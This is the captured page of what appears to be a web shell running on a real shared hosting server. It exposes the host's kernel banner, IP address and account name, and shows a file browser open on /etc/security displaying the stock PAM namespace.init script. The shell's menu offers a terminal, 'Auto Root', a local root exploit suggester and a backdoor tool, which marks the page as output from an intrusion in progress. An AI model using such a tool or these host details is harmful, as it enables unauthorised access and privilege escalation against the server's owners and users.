Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.6
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
etc /
security /
Delete
Unzip
Name
Size
Permission
Date
Action
console.apps
[ DIR ]
drwxr-xr-x
2025-08-26 08:58
console.perms.d
[ DIR ]
drwxr-xr-x
2025-08-26 08:58
limits.d
[ DIR ]
drwxr-xr-x
2025-08-26 08:58
namespace.d
[ DIR ]
drwxr-xr-x
2025-08-26 08:58
access.conf
4.46
KB
-rw-r--r--
2025-08-26 08:58
chroot.conf
82
B
-rw-r--r--
2025-08-26 08:58
console.handlers
624
B
-rw-r--r--
2025-08-26 08:58
console.perms
939
B
-rw-r--r--
2025-08-26 08:58
faillock.conf
2.18
KB
-rw-r--r--
2025-08-26 08:58
group.conf
3.55
KB
-rw-r--r--
2025-08-26 08:58
limits.conf
2.37
KB
-rw-r--r--
2025-08-26 08:58
namespace.conf
1.41
KB
-rw-r--r--
2025-08-26 08:58
namespace.init
1.92
KB
-rwxr-xr-x
2025-08-26 08:58
opasswd
0
B
-rw-------
2025-08-26 08:59
pam_env.conf
2.9
KB
-rw-r--r--
2025-08-26 08:58
pwhistory.conf
517
B
-rw-r--r--
2025-08-26 08:58
sepermit.conf
419
B
-rw-r--r--
2025-08-26 08:59
time.conf
2.13
KB
-rw-r--r--
2025-08-26 08:59
Save
Rename
#!/bin/sh # It receives as arguments: # - $1 polydir path (see WARNING below) # - $2 instance path (see WARNING below) # - $3 flag whether the instance dir was newly created (0 - no, 1 - yes) # - $4 user name # - $5 flag whether the polydir path ($1) is safe (0 - unsafe, 1 -safe) # - $6 flag whether the instance path ($2) is safe (0 - unsafe, 1 - safe) # # WARNING: This script is invoked with full root privileges. Accessing # the polydir ($1) and the instance ($2) directories in this context may be # extremely dangerous as those can be under user control. The flags $5 and $6 # are provided to let you know if all the segments part of the path (except the # last one) are owned by root and are writable by root only. If the path does # not meet these criteria, you expose yourself to possible symlink attacks when # accessing these path. # However, even if the path components are safe, the content of the # directories may still be owned/writable by a user, so care must be taken! # # The following section will copy the contents of /etc/skel if this is a # newly created home directory. # Executes only if the polydir path is safe if [ "$5" = 1 ]; then if [ "$3" = 1 ]; then # This line will fix the labeling on all newly created directories [ -x /sbin/restorecon ] && /sbin/restorecon "$1" user="$4" passwd=$(getent passwd "$user") homedir=$(echo "$passwd" | cut -f6 -d":") if [ "$1" = "$homedir" ]; then gid=$(echo "$passwd" | cut -f4 -d":") cp -rT /etc/skel "$homedir" chown -R "$user":"$gid" "$homedir" mask=$(sed -E -n 's/^UMASK[[:space:]]+([^#[:space:]]+).*/\1/p' /etc/login.defs) mode=$(printf "%o" $((0777 & ~mask))) chmod ${mode:-700} "$homedir" [ -x /sbin/restorecon ] && /sbin/restorecon -R "$homedir" fi fi fi exit 0